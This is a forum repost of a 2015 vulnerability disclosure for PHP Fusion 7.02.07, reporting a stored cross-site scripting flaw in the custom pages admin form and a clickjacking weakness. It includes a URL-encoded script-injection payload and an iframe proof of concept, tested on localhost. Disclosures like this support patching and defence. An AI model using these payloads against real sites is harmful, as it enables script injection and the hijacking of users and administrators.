Aerosol Posted May 6, 2015 Report Share Posted May 6, 2015 Hi Team,#Affected Vendor: https://www.php-fusion.co.uk/home.php#Date: 04/05/2015#Creditee: http://osvdb.org/creditees/13518-vadodil-joel-varghese#Type of vulnerability: Persistent XSS + Clickjacking#Tested on: Windows 8.1#Product: PHP Fusion#Version: 7.02.07#1 Cross Site Scriptingx-x-x-x-x-x-x-x-x-x-x-x-#Tested Link:http://localhost/PHPfusion/files/administration/custom_pages.php?aid=68bca08161175b0e#Description: PHP Fusion is vulnerable to stored cross site scritingvulnerability as the parameter "page_content" is vulnerable which will leadto its compromise.#Proof of Concept (PoC):page_title=%22%3E%3Cimg+src%3D%22blah.jpg%22+onerror%3D%22alert%28%27pWnEd%27%29%22%2F%3E&page_access=0&page_content=%22%3E%3Cimg+src%3D%22blah.jpg%22+onerror%3D%22alert%28%27pWnEd%21%21%27%29%22%2F%3E&add_link=1&page_comments=1&page_ratings=1&save=Save+Page#2 UI redress attackx-x-x-x-x-x-x-x-x-x-x#Tested Link: http://localhost/PHPfusion/files/viewpage.php?page_id=5#Description: PHP Fusion is vulnerable to UI redress attack as multipletransparent or opaque layers can be used to trick a user into clicking on abutton or link on another page when they were intending to click on the thetop level page.#Proof of Concept (PoC): <iframe src="http://localhost/PHPfusion/files/viewpage.php?page_id=5" sanboxed width=900height=900> Please check me out !!!! </iframe>-- Regards,*Joel V*Source Quote Link to comment Share on other sites More sharing options...
